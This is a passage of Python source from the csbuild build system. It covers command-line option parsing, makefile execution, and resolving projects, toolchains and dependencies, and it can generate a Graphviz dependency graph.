internally.
:return: The given argument, if it exists. If the argument has never been specified, returns csbuild.ARG_NOT_SET.
If --help has been specified, this will ALWAYS return csbuild.ARG_NOT_SET for user-specified arguments.
Handle csbuild.ARG_NOT_SET to prevent code from being unintentionally run with --help.
"""
global args
if _runMode != RunMode.Help:
newparser = argparse.ArgumentParser( )
global _options
for opt in _options:
newparser.add_argument( *opt[0], **opt[1] )
_options = []
newargs, remainder = newparser.parse_known_args( args.remainder )
args.__dict__.update( newargs.__dict__ )
args.remainder = remainder
option = option.replace( "-", "_" )
if hasattr( args, option ):
return getattr( args, option )
else:
return ARG_NOT_SET
def AddOption( *args, **kwargs ):
"""
Adds an option to the argument parser.
The syntax for this is identical to the ArgParse add_argument syntax; see
the :argparse: documentation
"""
_options.append( [args, kwargs] )
def GetArgs( ):
"""
Gets all of the arguments parsed by the argument parser.
:return: an argparse.Namespace object
:rtype: argparse.Namespace
"""
global args
if _runMode != RunMode.Help:
newparser = argparse.ArgumentParser( )
global _options
for opt in _options:
newparser.add_argument( *opt[0], **opt[1] )
_options = []
newargs, remainder = newparser.parse_known_args( args.remainder )
args.__dict__.update( newargs.__dict__ )
args.remainder = remainder
return vars( args )
def GetArgDefault( argname ):
"""
Gets the default argument for the requested option
:type argname: str
:param argname: the name of the option
"""
global parser
return parser.get_default( argname )
def GetTargetList():
"""
Get the list of targets currently being built.
If no target has been specified (the default is being used), this list is empty.
:return: The list of targets
:rtype: list[str]
"""
return _shared_globals.target_list
def GetRunMode():
"""
Get the mode csbuild is current running under.
:return: The run mode.
:rtype: int
"""
return _runMode
class _dummy( object ):
def __setattr__( self, key, value ):
pass
def __getattribute__( self, item ):
return ""
def _execfile( file, glob, loc ):
# Save the current value of __file__ and set it to the input file path.
oldFileVar = glob.get("__file__", None)
glob["__file__"] = file
with open( file, "r" ) as f:
exec(compile(f.read( ), file, "exec"), glob, loc)
# Restore the state of the __file__ variable.
if oldFileVar is None:
glob["__file__"] = oldFileVar
else:
del glob["__file__"]
mainFile = ""
mainFileDir = ""
def _run( ):
_setupdefaults( )
#Initialized here to avoid a circular dependency
_shared_globals.globalPreMakeSteps = _utils.OrderedSet()
_shared_globals.globalPostMakeSteps = _utils.OrderedSet()
global args
args = _dummy( )
global mainFile
global mainFileDir
mainFile = sys.modules['__main__'].__file__
if mainFile is not None:
mainFileDir = os.path.abspath( os.path.dirname( mainFile ) )
if mainFileDir:
os.chdir( mainFileDir )
mainFile = os.path.basename( os.path.abspath( mainFile ) )
else:
mainFileDir = os.path.abspath( os.getcwd( ) )
scriptFiles.append(os.path.join(mainFileDir, mainFile))
if "-h" in sys.argv or "--help" in sys.argv:
global _runMode
_runMode = RunMode.Help
_execfile( mainFile, _shared_globals.makefile_dict, _shared_globals.makefile_dict )
_shared_globals.sortedProjects = _utils.SortProjects( _shared_globals.tempprojects )
else:
log.LOG_ERROR( "CSB cannot be run from the interactive console." )
Exit( 1 )
csbDir = os.path.join(mainFileDir, ".csbuild")
if not os.path.exists(csbDir):
os.makedirs(csbDir)
_shared_globals.cacheDirectory = os.path.join(csbDir, "cache")
if not os.path.exists(_shared_globals.cacheDirectory):
os.makedirs(_shared_globals.cacheDirectory)
logDirectory = os.path.join(csbDir, "log")
if not os.path.exists(logDirectory):
os.makedirs(logDirectory)
logFile = os.path.join(logDirectory, "build.log")
logBackup = "{}.4".format(logFile)
if os.path.exists(logBackup):
os.remove(logBackup)
for i in range(3,0,-1):
logBackup = "{}.{}".format(logFile, i)
if os.path.exists(logBackup):
newBackup = "{}.{}".format(logFile, i+1)
os.rename(logBackup, newBackup)
if os.path.exists(logFile):
logBackup = "{}.1".format(logFile)
os.rename(logFile, logBackup)
_shared_globals.logFile = open(logFile, "w")
epilog = " ------------------------------------------------------------ \n\nProjects available in this makefile (listed in build order):\n\n"
projtable = [[]]
i = 1
j = 0
maxcols = min( math.floor( len( _shared_globals.sortedProjects ) / 4 ), 4 )
for proj in _shared_globals.sortedProjects:
projtable[j].append( proj.name )
if i < maxcols:
i += 1
else:
projtable.append( [] )
i = 1
j += 1
if projtable:
maxlens = [15] * len( projtable[0] )
for index in range( len( projtable ) ):
col = projtable[index]
for subindex in range( len( col ) ):
maxlens[subindex] = max( maxlens[subindex], len( col[subindex] ) )
for index in range( len( projtable ) ):
col = projtable[index]
for subindex in range( len( col ) ):
item = col[subindex]
epilog += " "
epilog += item
for space in range( maxlens[subindex] - len( item ) ):
epilog += " "
epilog += " "
epilog += "\n"
epilog += "\nTargets available in this makefile:\n\n"
targtable = [[]]
i = 1
j = 0
maxcols = min( math.floor( len( _shared_globals.alltargets ) / 4 ), 4 )
for targ in _shared_globals.alltargets:
targtable[j].append( targ )
if i < maxcols:
i += 1
else:
targtable.append( [] )
i = 1
j += 1
if targtable:
maxlens = [15] * len( targtable[0] )
for index in range( len( targtable ) ):
col = targtable[index]
for subindex in range( len( col ) ):
maxlens[subindex] = max( maxlens[subindex], len( col[subindex] ) )
for index in range( len( targtable ) ):
col = targtable[index]
for subindex in range( len( col ) ):
item = col[subindex]
epilog += " "
epilog += item
for space in range( maxlens[subindex] - len( item ) ):
epilog += " "
epilog += " "
epilog += "\n"
global parser
parser = argparse.ArgumentParser(
prog = mainFile, epilog = epilog, formatter_class = argparse.RawDescriptionHelpFormatter )
group = parser.add_mutually_exclusive_group( )
group.add_argument( '-t', '--target', action='append', help = 'Target(s) for build', default=[])
group.add_argument( '--at', "--all-targets", action = "store_true", help = "Build all targets" )
parser.add_argument(
"-p",
"--project",
action = "append",
help = "Build only the specified project. May be specified multiple times."
)
group = parser.add_mutually_exclusive_group( )
group.add_argument( '-c', '--clean', action = "store_true", help = 'Clean the target build' )
group.add_argument( '--install', action = "store_true", help = 'Install the target build' )
group.add_argument( '--install-headers', action = "store_true", help = 'Install only headers for the target build' )
group.add_argument( '--install-output', action = "store_true", help = 'Install only the output for the target build' )
group.add_argument( '--version', action = "store_true", help = "Print version information and exit" )
group.add_argument( '-r', '--rebuild', action = "store_true", help = 'Clean the target build and then build it' )
group2 = parser.add_mutually_exclusive_group( )
group2.add_argument( '-v', '--verbose', action = "store_const", const = 0, dest = "quiet",
help = "Verbose. Enables additional INFO-level logging.", default = 1 )
group2.add_argument( '-q', '--quiet', action = "store_const", const = 2, dest = "quiet",
help = "Quiet. Disables all logging except for WARN and ERROR.", default = 1 )
group2.add_argument( '-qq', '--very-quiet', action = "store_const", const = 3, dest = "quiet",
help = "Very quiet. Disables all csb-specific logging.", default = 1 )
parser.add_argument( "-j", "--jobs", action = "store", dest = "jobs", type = int, help = "Number of simultaneous build processes" )
parser.add_argument(
"-l",
"--linker-jobs",
action = "store",
dest = "linker_jobs",
type = int,
help = "Max number of simultaneous link processes. (If not specified, same value as -j.)"
"Note that this pool is shared with build threads, and linker will only get one thread from the pool until compile threads start becoming free."
"This value only specifies a maximum."
)
parser.add_argument( "-g", "--gui", action = "store_true", dest = "gui", help = "Show GUI while building (experimental)")
parser.add_argument( "--auto-close-gui", action = "store_true", help = "Automatically close the gui on build success (will stay open on failure)")
parser.add_argument("--profile", action="store_true", help="Collect detailed line-by-line profiling information on compile time. --gui option required to see this information.")
parser.add_argument( '--show-commands', help = "Show all commands sent to the system.", action = "store_true" )
parser.add_argument( '--force-color', help = "Force color on or off.",
action = "store", choices = ["on", "off"], default = None, const = "on", nargs = "?" )
parser.add_argument( '--force-progress-bar', help = "Force progress bar on or off.",
action = "store", choices = ["on", "off"], default = None, const = "on", nargs = "?" )
parser.add_argument( '--prefix', help = "install prefix (default /usr/local)", action = "store" )
parser.add_argument( '--libdir', help = "install location for libraries (default {prefix}/lib)", action = "store" )
parser.add_argument( '--incdir', help = "install prefix (default {prefix}/include)", action = "store" )
group = parser.add_mutually_exclusive_group( )
group.add_argument( '-o', '--toolchain', help = "Toolchain to use for compiling.",
choices = _shared_globals.alltoolchains, default=[], action = "append" )
group.add_argument( "--ao", '--all-toolchains', help="Build with all toolchains", action = "store_true" )
group = parser.add_mutually_exclusive_group( )
for toolchainName, toolchainArchStrings in _shared_globals.allToolchainArchStrings.items():
archStringLong = "--" + toolchainArchStrings[0]
archStringShort = "--" + toolchainArchStrings[1]
parser.add_argument(archStringLong, archStringShort, help = "Architecture to compile for the {} toolchain.".format(toolchainName), action = "append")
group.add_argument("-a", "--architecture", "--arch", help = 'Architecture to compile for each toolchain.', action = "append")
group.add_argument("--aa", "--all-architectures", "--all-arch", action = "store_true", help = "Build all architectures supported by this toolchain" )
parser.add_argument(
"--stop-on-error",
help = "Stop compilation after the first error is encountered.",
action = "store_true"
)
parser.add_argument( '--no-precompile', help = "Disable precompiling globally, affects all projects",
action = "store_true" )
parser.add_argument( '--no-chunks', help = "Disable chunking globally, affects all projects",
action = "store_true" )
parser.add_argument( '--dg', '--dependency-graph', help="Generate dependency graph", action="store_true")
parser.add_argument( '--with-libs', help="Include linked libraries in dependency graph", action="store_true" )
parser.add_argument( "-d", "--define", help = "Add defines to each project being built.", action = "append")
group = parser.add_argument_group( "Solution generation", "Commands to generate a solution" )
group.add_argument( '--generate-solution', help = "Generate a solution file for use with the given IDE.",
choices = _shared_globals.allgenerators.keys( ), action = "store" )
group.add_argument( '--solution-path',
help = "Path to output the solution file (default is ./Solutions/<solutiontype>)", action = "store",
default = "" )
group.add_argument( '--solution-name', help = "Name of solution output file (default is csbuild)", action = "store",
default = "csbuild" )
group.add_argument( '--solution-args', help = 'Arguments passed to the build script executed by the solution',
action = "store", default = "")
#TODO: Additional args here
for chain in _shared_globals.alltoolchains.items( ):
chainInst = chain[1]()
argfuncs = set()
for tool in chainInst.tools.values():
if(
hasattr(tool.__class__, "AdditionalArgs")
and tool.__class__.AdditionalArgs != toolchain.compilerBase.AdditionalArgs
and tool.__class__.AdditionalArgs != toolchain.linkerBase.AdditionalArgs
):
argfuncs.add(tool.__class__.AdditionalArgs)
if argfuncs:
group = parser.add_argument_group( "Options for toolchain {}".format( chain[0] ) )
for func in argfuncs:
func( group )
for gen in _shared_globals.allgenerators.items( ):
if gen[1].AdditionalArgs != project_generator.project_generator.AdditionalArgs:
group = parser.add_argument_group( "Options for solution generator {}".format( gen[0] ) )
gen[1].AdditionalArgs( group )
if _options:
group = parser.add_argument_group( "Local makefile options" )
for option in _options:
group.add_argument( *option[0], **option[1] )
args, remainder = parser.parse_known_args( )
args.remainder = remainder
# Note:
# The reason for this line of code is that the import lock, in the way that CSBuild operates, prevents
# us from being able to call subprocess.Popen() or any other process execution function other than os.popen().
# This exists to prevent multiple threads from importing at the same time, so... Within csbuild, never import
# within any thread but the main thread. Any import statements used by threads should be in the module those
# thread objects are defined in so they're completed in full on the main thread before that thread starts.
#
# After this point, the LOCK IS RELEASED. Importing is NO LONGER THREAD-SAFE. DON'T DO IT.
if imp.lock_held():
imp.release_lock()
if args.version:
print("CSBuild version {}".format( __version__ ))
print(__copyright__)
print("Code by {}".format( __author__ ))
print("Additional credits: {}".format( ", ".join( __credits__ ) ))
print("\nMaintainer: {} - {}".format( __maintainer__, __email__ ))
return
# Add any defines that were passed in from the command line.
if args.define:
for define in args.define:
AddDefines(define)
_shared_globals.CleanBuild = args.clean
_shared_globals.do_install = args.install or args.install_headers or args.install_output
_shared_globals.quiet = args.quiet
_shared_globals.show_commands = args.show_commands
_shared_globals.rebuild = args.rebuild or args.profile
if args.gui and _shared_globals.CleanBuild:
log.LOG_INFO("The GUI is currently disabled when performing a clean.")
args.gui = False
if args.profile and not args.gui:
log.LOG_WARN("Profile mode has no effect without --gui. Disabling --profile.")
args.profile = False
if args.profile and not args.rebuild:
log.LOG_WARN("A full build is required to collect profiling information. Forcing --rebuild flag.")
project_build_list = None
if args.project:
project_build_list = set( args.project )
if args.force_color == "on":
_shared_globals.color_supported = True
elif args.force_color == "off":
_shared_globals.color_supported = False
_shared_globals.forceProgressBar = args.force_progress_bar
if args.prefix:
_shared_globals.install_prefix = os.path.abspath(args.prefix)
if args.libdir:
_shared_globals.install_libdir = args.libdir
if args.incdir:
_shared_globals.install_incdir = args.incdir
#This allows a first pass to pick up prefix, while keeping project macros for a later pass.
class DummyProj(object):
def __getattr__(self, name):
return "{{project.{}}}".format(name)
proj = DummyProj()
_shared_globals.install_libdir = os.path.abspath(_shared_globals.install_libdir.format(prefix=_shared_globals.install_prefix, project=proj))
_shared_globals.install_incdir = os.path.abspath(_shared_globals.install_incdir.format(prefix=_shared_globals.install_prefix, project=proj))
if args.jobs:
_shared_globals.max_threads = args.jobs
_shared_globals.semaphore = threading.BoundedSemaphore( value = _shared_globals.max_threads )
if args.linker_jobs:
_shared_globals.max_linker_threads = max(args.linker_jobs, _shared_globals.max_threads)
_shared_globals.link_semaphore = threading.BoundedSemaphore( value = _shared_globals.max_linker_threads )
_shared_globals.profile = args.profile
_shared_globals.disable_chunks = args.no_chunks
_shared_globals.disable_precompile = args.no_precompile or args.profile
_shared_globals.stopOnError = args.stop_on_error
if args.generate_solution is not None:
_runMode = RunMode.GenerateSolution
args.at = True
args.aa = True
#args.ao = True
if args.at:
_shared_globals.target_list = list(_shared_globals.alltargets)
elif args.target:
_shared_globals.target_list = args.target
#there's an execfile on this up above, but if we got this far we didn't pass --help or -h, so we need to do this here instead
_execfile( mainFile, _shared_globals.makefile_dict, _shared_globals.makefile_dict )
parser.parse_args(args.remainder)
validArchList = set()
if args.ao:
_shared_globals.selectedToolchains = set( ) # Reset the selected toolchains.
for chain in _shared_globals.alltoolchains:
validArchList |= set(_shared_globals.alltoolchains[chain.lower()]().GetValidArchitectures())
elif args.toolchain:
_shared_globals.selectedToolchains = set( ) # Reset the selected toolchains.
for chain in args.toolchain:
if chain.lower() not in _shared_globals.alltoolchains:
log.LOG_ERROR( "Unknown toolchain: {}".format( chain ) )
return
validArchList |= set(_shared_globals.alltoolchains[chain.lower()]().GetValidArchitectures())
else:
if platform.system( ) == "Windows":
validArchList |= set(_shared_globals.alltoolchains["msvc"]().GetValidArchitectures())
else:
validArchList |= set(_shared_globals.alltoolchains["gcc"]().GetValidArchitectures())
def BuildWithToolchain( chain ):
def BuildWithTarget( target ):
if target is not None:
_shared_globals.target = target.lower( )
def BuildWithArchitecture( project, architecture ):
_shared_globals.allarchitectures.add(architecture)
os.chdir( project.scriptPath )
newproject = project.copy()
if _shared_globals.target:
newproject.targetName = _shared_globals.target
else:
newproject.targetName = projectSettings.currentProject.defaultTarget
if newproject.targetName not in newproject.targets:
log.LOG_INFO( "Project {} has no rules specified for target {}. Skipping.".format( newproject.name,
newproject.targetName ) )
return
projectSettings.currentProject = newproject
SetOutputArchitecture(architecture)
for targetFunc in newproject.targets[newproject.targetName]:
targetFunc( )
if newproject.outputArchitecture in newproject.archFuncs:
for archFunc in newproject.archFuncs[newproject.outputArchitecture]:
archFunc()
for file in newproject.fileOverrides:
projCopy = newproject.copy()
projectSettings.currentProject = projCopy
for func in newproject.fileOverrides[file]:
func()
newproject.fileOverrideSettings[file] = projCopy
alteredLinkDepends = []
alteredLinkDependsIntermediate = []
alteredLinkDependsFinal = []
alteredSrcDepends = []
alteredSrcDependsIntermediate = []
alteredSrcDependsFinal = []
for depend in newproject.linkDepends:
if depend.includeToolchains and newproject.activeToolchainName not in depend.includeToolchains:
continue
if depend.includeArchitectures and newproject.outputArchitecture not in depend.includeArchitectures:
continue
if depend.excludeToolchains and newproject.activeToolchainName in depend.excludeToolchains:
continue
if depend.excludeArchitectures and newproject.outputArchitecture in depend.excludeArchitectures:
continue
alteredLinkDepends.append( "{}@{}#{}${}".format( depend.libName, projectSettings.currentProject.targetName, projectSettings.currentProject.outputArchitecture, projectSettings.currentProject.activeToolchainName ) )
for depend in newproject.linkDependsIntermediate:
if depend.includeToolchains and newproject.activeToolchainName not in depend.includeToolchains:
continue
if depend.includeArchitectures and newproject.outputArchitecture not in depend.includeArchitectures:
continue
if depend.excludeToolchains and newproject.activeToolchainName in depend.excludeToolchains:
continue
if depend.excludeArchitectures and newproject.outputArchitecture in depend.excludeArchitectures:
continue
alteredLinkDependsIntermediate.append( "{}@{}#{}${}".format( depend.libName, projectSettings.currentProject.targetName, projectSettings.currentProject.outputArchitecture, projectSettings.currentProject.activeToolchainName ) )
for depend in newproject.linkDependsFinal:
if depend.includeToolchains and newproject.activeToolchainName not in depend.includeToolchains:
continue
if depend.includeArchitectures and newproject.outputArchitecture not in depend.includeArchitectures:
continue
if depend.excludeToolchains and newproject.activeToolchainName in depend.excludeToolchains:
continue
if depend.excludeArchitectures and newproject.outputArchitecture in depend.excludeArchitectures:
continue
alteredLinkDependsFinal.append( "{}@{}#{}${}".format( depend.libName, projectSettings.currentProject.targetName, projectSettings.currentProject.outputArchitecture, projectSettings.currentProject.activeToolchainName ) )
for depend in newproject.srcDepends:
if depend.includeToolchains and newproject.activeToolchainName not in depend.includeToolchains:
continue
if depend.includeArchitectures and newproject.outputArchitecture not in depend.includeArchitectures:
continue
if depend.excludeToolchains and newproject.activeToolchainName in depend.excludeToolchains:
continue
if depend.excludeArchitectures and newproject.outputArchitecture in depend.excludeArchitectures:
continue
alteredSrcDepends.append( "{}@{}#{}${}".format( depend.libName, projectSettings.currentProject.targetName, projectSettings.currentProject.outputArchitecture, projectSettings.currentProject.activeToolchainName ) )
for depend in newproject.srcDependsIntermediate:
if depend.includeToolchains and newproject.activeToolchainName not in depend.includeToolchains:
continue
if depend.includeArchitectures and newproject.outputArchitecture not in depend.includeArchitectures:
continue
if depend.excludeToolchains and newproject.activeToolchainName in depend.excludeToolchains:
continue
if depend.excludeArchitectures and newproject.outputArchitecture in depend.excludeArchitectures:
continue
alteredSrcDependsIntermediate.append( "{}@{}#{}${}".format( depend.libName, projectSettings.currentProject.targetName, projectSettings.currentProject.outputArchitecture, projectSettings.currentProject.activeToolchainName ) )
for depend in newproject.srcDependsFinal:
if depend.includeToolchains and newproject.activeToolchainName not in depend.includeToolchains:
continue
if depend.includeArchitectures and newproject.outputArchitecture not in depend.includeArchitectures:
continue
if depend.excludeToolchains and newproject.activeToolchainName in depend.excludeToolchains:
continue
if depend.excludeArchitectures and newproject.outputArchitecture in depend.excludeArchitectures:
continue
alteredSrcDependsFinal.append( "{}@{}#{}${}".format( depend.libName, projectSettings.currentProject.targetName, projectSettings.currentProject.outputArchitecture, projectSettings.currentProject.activeToolchainName ) )
newproject.linkDepends = alteredLinkDepends
newproject.linkDependsIntermediate = alteredLinkDependsIntermediate
newproject.linkDependsFinal = alteredLinkDependsFinal
newproject.srcDepends = alteredSrcDepends
newproject.srcDependsIntermediate = alteredSrcDependsIntermediate
newproject.srcDependsFinal = alteredSrcDependsFinal
newproject.key = "{}@{}#{}${}".format( newproject.name, newproject.targetName, newproject.outputArchitecture, newproject.activeToolchainName )
_shared_globals.projects.update( { newproject.key: newproject } )
for project in _shared_globals.tempprojects.values( ):
if chain is not None:
_shared_globals.selectedToolchains.add(chain)
project.activeToolchainName = chain
if project.supportedToolchains and project.activeToolchainName not in project.supportedToolchains:
continue
project.activeToolchain = project.toolchains[project.activeToolchainName]
cmdLineGlobalArchList = args.architecture
cmdLineToolchainArchList = args.__dict__[_shared_globals.allToolchainArchStrings[project.activeToolchainName][0].replace("-", "_")]
cmdLineArchList = set()
if cmdLineGlobalArchList:
cmdLineArchList.update(cmdLineGlobalArchList)
if cmdLineToolchainArchList:
cmdLineArchList.update(cmdLineToolchainArchList)
if cmdLineArchList:
for arch in cmdLineArchList:
if arch not in validArchList:
log.LOG_ERROR("Toolchain {} does not support architecture {}".format(project.activeToolchainName, arch))
Exit(1)
architectures = _utils.OrderedSet(project.activeToolchain.GetValidArchitectures())
if project.supportedArchitectures:
architectures &= project.supportedArchitectures
if arch in architectures:
BuildWithArchitecture(project, arch)
elif args.aa:
architectures = _utils.OrderedSet(project.activeToolchain.GetValidArchitectures())
if project.supportedArchitectures:
architectures &= project.supportedArchitectures
for arch in architectures:
BuildWithArchitecture(project, arch)
else:
BuildWithArchitecture(project, project.activeToolchain.Compiler().GetDefaultArchitecture())
if args.at:
for target in _shared_globals.alltargets:
BuildWithTarget( target )
elif args.target:
for target in args.target:
BuildWithTarget( target )
for target in args.target:
if target.lower( ) not in _shared_globals.alltargets:
log.LOG_ERROR( "Unknown target: {}".format( target ) )
return False
else:
BuildWithTarget( None )
return True
if args.ao:
_shared_globals.selectedToolchains = set( ) # Reset the selected toolchains.
for chain in _shared_globals.alltoolchains:
if not BuildWithToolchain( chain ):
return
elif args.toolchain:
_shared_globals.selectedToolchains = set( ) # Reset the selected toolchains.
for chain in args.toolchain:
if chain.lower() not in _shared_globals.alltoolchains:
log.LOG_ERROR( "Unknown toolchain: {}".format( chain ) )
return
if not BuildWithToolchain( chain ):
return
else:
BuildWithToolchain( None )
os.chdir( mainFileDir )
if project_build_list:
inputProjectSet = set( project_build_list )
existingProjectSet = set( _shared_globals.tempprojects )
validProjectSet = set()
foundExistingProjectSet = set()
foundValidProjectSet = set()
for proj in _shared_globals.projects.keys():
projName = proj.rsplit( "@", 1 )[0]
validProjectSet.add( projName ) # Fill in the set of valid projects for the current build.
if projName in inputProjectSet:
_shared_globals.project_build_list.add( proj )
# Search for projects that are either not valid or non-existent.
for projName in inputProjectSet:
if projName in existingProjectSet:
foundExistingProjectSet.add( projName )
if projName in validProjectSet:
foundValidProjectSet.add( projName )
# Create a list of the projects that don't exist and a list of projects that are invalid for the current build.
nonExistentProjectList = sorted( inputProjectSet.difference( foundExistingProjectSet ) )
invalidProjectList = sorted( inputProjectSet.difference( nonExistentProjectList ).difference( foundValidProjectSet ) )
forceExit = False
if nonExistentProjectList:
log.LOG_ERROR( "The following projects do not exist: {}".format( ", ".join( nonExistentProjectList ) ) )
forceExit = True
if invalidProjectList:
log.LOG_ERROR( "The following projects cannot be built with the selected configuration: {}".format( ", ".join( invalidProjectList ) ) )
forceExit = True
if forceExit:
Exit( 1 )
else:
_shared_globals.project_build_list = set(_shared_globals.projects.keys())
for projName in _shared_globals.projects:
project = _shared_globals.projects[projName]
flats_added = {projName}
def add_flats(deps):
for dep in deps:
if dep in flats_added:
continue
flats_added.add(dep)
project.flattenedDepends.add(dep)
proj = _shared_globals.projects[dep]
add_flats(proj.linkDepends)
add_flats(proj.linkDependsIntermediate)
add_flats(proj.linkDependsFinal)
depends = project.linkDepends + project.linkDependsIntermediate + project.linkDependsFinal
for dep in depends:
if dep not in _shared_globals.projects:
log.LOG_ERROR("Project {} references unknown dependency {}".format(project.name, dep.rsplit("@")[0]))
return
proj = _shared_globals.projects[dep]
project.flattenedDepends.add(dep)
add_flats(proj.linkDepends)
add_flats(proj.linkDependsFinal)
add_flats(proj.linkDependsIntermediate)
project.finalizeSettings()
if project.type == ProjectType.Application:
project.linkDepends += project.linkDependsFinal
project.linkDependsFinal = []
for projName in _shared_globals.projects:
project = _shared_globals.projects[projName]
intermediates_added = {projName}
finals_added = {projName}
def add_intermediates(deps):
for dep in deps:
if dep in intermediates_added:
continue
intermediates_added.add(dep)
project.reconciledLinkDepends.add(dep)
proj = _shared_globals.projects[dep]
add_finals(proj.linkDependsIntermediate)
def add_finals(deps):
for dep in deps:
if dep in finals_added:
continue
finals_added.add(dep)
project.reconciledLinkDepends.add(dep)
proj = _shared_globals.projects[dep]
add_finals(proj.linkDependsFinal)
depends = project.linkDepends
if args.dg:
depends = project.linkDepends + project.linkDependsIntermediate + project.linkDependsFinal
for dep in depends:
if dep not in _shared_globals.projects:
log.LOG_ERROR("Project {} references unknown dependency {}".format(project.name, dep.rsplit("@")[0]))
return
proj = _shared_globals.projects[dep]
project.reconciledLinkDepends.add(dep)
if args.dg:
add_finals(proj.linkDependsFinal)
add_intermediates(proj.linkDependsIntermediate)
elif project.type == ProjectType.Application:
add_finals(proj.linkDependsFinal)
else:
add_intermediates(proj.linkDependsIntermediate)
if not args.dg:
project.finalizeSettings2()
already_errored_link = { }
already_errored_source = { }
def insert_depends( proj, projList, already_inserted = set( ) ):
already_inserted.add( proj.key )
if proj not in already_errored_link:
already_errored_link[proj] = set( )
already_errored_source[proj] = set( )
for depend in proj.reconciledLinkDepends:
if depend in already_inserted:
log.LOG_WARN(
"Circular dependencies detected: {0} and {1} in linkDepends".format( depend.rsplit( "@", 1 )[0],
proj.name ) )
continue
if depend not in _shared_globals.projects:
if depend not in already_errored_link[proj]:
log.LOG_ERROR(
"Project {} references non-existent link dependency {}".format( proj.name,
depend.rsplit( "@", 1 )[0] ) )
already_errored_link[proj].add( depend )
proj.reconciledLinkDepends.remove(depend)
continue
projData = _shared_globals.projects[depend]
projList[depend] = projData
insert_depends( projData, projList )
for index in range( len( proj.srcDepends ) ):
depend = proj.srcDepends[index]
if depend in already_inserted:
log.LOG_WARN(
"Circular dependencies detected: {0} and {1} in srcDepends".format( depend.rsplit( "@", 1 )[0],
proj.name ) )
continue
if depend not in _shared_globals.projects:
if depend not in already_errored_link[proj]:
log.LOG_ERROR(
"Project {} references non-existent link dependency {}".format( proj.name,
depend.rsplit( "@", 1 )[0] ) )
already_errored_link[proj].add( depend )
del proj.srcDepends[index]
continue
projData = _shared_globals.projects[depend]
projList[depend] = projData
insert_depends( projData, projList )
already_inserted.remove( proj.key )
if _shared_globals.project_build_list:
newProjList = { }
for proj in _shared_globals.project_build_list:
projData = _shared_globals.projects[proj]
newProjList[proj] = projData
insert_depends( projData, newProjList )
_shared_globals.projects = newProjList
_shared_globals.sortedProjects = _utils.SortProjects( _shared_globals.projects )
if args.dg:
builder = StringIO()
builder.write('digraph G {\n\tlayout="neato";\n\toverlap="false";\n\tsplines="spline"\n')
colors = [
"#ff0000", "#cc5200", "#b2742d", "#858c23", "#20802d",
"#00ffcc", "#39c3e6", "#205380", "#003380", "#38008c",
"#ff40d9", "#e53967", "#f20000", "#7f4620", "#cca300",
"#66ff00", "#00cc6d", "#36d9ce", "#007a99", "#0061f2",
"#0000f2", "#cc00ff", "#d9368d", "#7f202d", "#991400",
"#f28100", "#dae639", "#69bf30", "#269973", "#208079",
"#00a2f2", "#397ee6", "#0000e6", "#8d29a6", "#990052"
]
idx = 0
libs_drawn = set()
for project in _shared_globals.sortedProjects:
color = colors[idx]
idx += 1
if idx == len(colors):
idx = 0
builder.write('\t{0} [shape="{1}" color="{2}" style="filled" fillcolor="{2}30"];\n'.format(project.name, "box3d" if project.type == ProjectType.Application else "oval", color))
for dep in project.linkDepends:
otherProj = _shared_globals.projects[dep]
builder.write('\t{} -> {} [color="{}"];\n'.format(project.name, otherProj.name, color))
for dep in project.linkDependsIntermediate:
otherProj = _shared_globals.projects[dep]
builder.write('\t{} -> {} [color="{}B0" style="dashed" arrowhead="onormal"];\n'.format(project.name, otherProj.name, color))
for dep in project.linkDependsFinal:
otherProj = _shared_globals.projects[dep]
builder.write('\t{} -> {} [color="{}B0" style="dashed" arrowhead="onormal"];\n'.format(project.name, otherProj.name, color))
if args.with_libs:
project.activeToolchain = project.toolchains[project.activeToolchainName]
project.activeToolchain.SetActiveTool("linker")
def drawLibs(libraries, style):
for lib in libraries:
lib = lib.replace("-", "_")
if lib not in libs_drawn:
builder.write('\t{} [shape="diamond" color="#303030" style="filled" fillcolor="#D0D0D080"];\n'.format(lib))
libs_drawn.add(lib)
builder.write('\t{} -> {} [color="{}" style="{}" arrowhead="onormal"];\n'.format(project.name, lib, color, style))
drawLibs(project.libraries, "solid")
if "libraries" in project._intermediateScopeSettings:
drawLibs(project._intermediateScopeSettings["libraries"], "dashed")
if "libraries" in project._finalScopeSettings:
drawLibs(project._finalScopeSettings["libraries"], "dashed")
tc = object.__getattribute__(project, "finalToolchains")[object.__getattribute__(project, "activeToolchainName")]
tc.SetActiveTool("linker")
if "libraries" in tc.activeTool._settingsOverrides:
drawLibs(tc.activeTool._settingsOverrides["libraries"], "dashed")
tc = object.__getattribute__(project, "intermediateToolchains")[object.__getattribute__(project, "activeToolchainName")]
tc.SetActiveTool("linker")
if "libraries" in tc.activeTool._settingsOverrides:
drawLibs(tc.activeTool._settingsOverrides["libraries"], "dashed")
builder.write("}\n")
with open("depends.gv", "w") as f:
f.write(builder.getvalue())
log.LOG_BUILD("Wrote depends.gv")
try:
from graphviz import Digraph
except:
log.LOG_WARN("graphviz library not found. You can open depends.gv with graphviz or a similar dot viewer to view the graph, or install graphviz with pip install graphviz.")
else:
graph = Digraph(comment="CSBuild Dependency Graph", format="png", engine="dot", filename="depends")
Digraph.source=property(lambda self: builder.getvalue())
graph.render("depends.gv", view=True)
log.LOG_BUILD("Wrote depends.png")
return
#headerCacheFile = os.path.join(_shared_globals.cacheDirectory, "header_info.csbc")
#if os.path.exists(headerCacheFile):
# log.LOG_BUILD("Loading cache data...")
# with open(headerCacheFile, "rb") as f:
# _shared_globals.allheaders = pickle.load(f)
# mtime = os.path.getmtime(headerCacheFile)
# for header in _shared_globals.allheaders.keys():
# if not header:
# continue
# try:
# htime = os.path.getmtime(header)
# if htime > mtime:
# del _shared_globals.allheaders[header]
# except:
# del _shared_globals.allheaders[header]
for proj in _shared_globals.sortedProjects:
if proj.prebuilt == False and (proj.shell == False or args.generate_solution):
proj.prepareBuild( )
else:
proj.minimalPrepareBuild()
# Remove projects that don't actually build.
_shared_globals.sortedProjects = [ proj for proj in _shared_globals.sortedProjects if proj.prebuilt == False and (proj.shell == False or args.generate_solution) ]
#with open(headerCacheFile, "wb") as f:
# pickle.dump(_shared_globals.allheaders, f, 2)
_utils.CheckVersion( )
totaltime = time.time( ) - _shared_globals.starttime
totalmin = math.floor( totaltime / 60 )
totalsec = math.floor( totaltime % 60 )
_utils.ChunkedBuild( )
_utils.PreparePrecompiles( )
log.LOG_BUILD( "Task preparation took {0}:{1:02}".format( int( totalmin ), int( totalsec ) ) )
if args.gui:
_shared_globals.autoCloseGui = args.auto_close_gui
from . import _gui
global _guiModule
_guiModule = _gui
if args.generate_solution is not None:
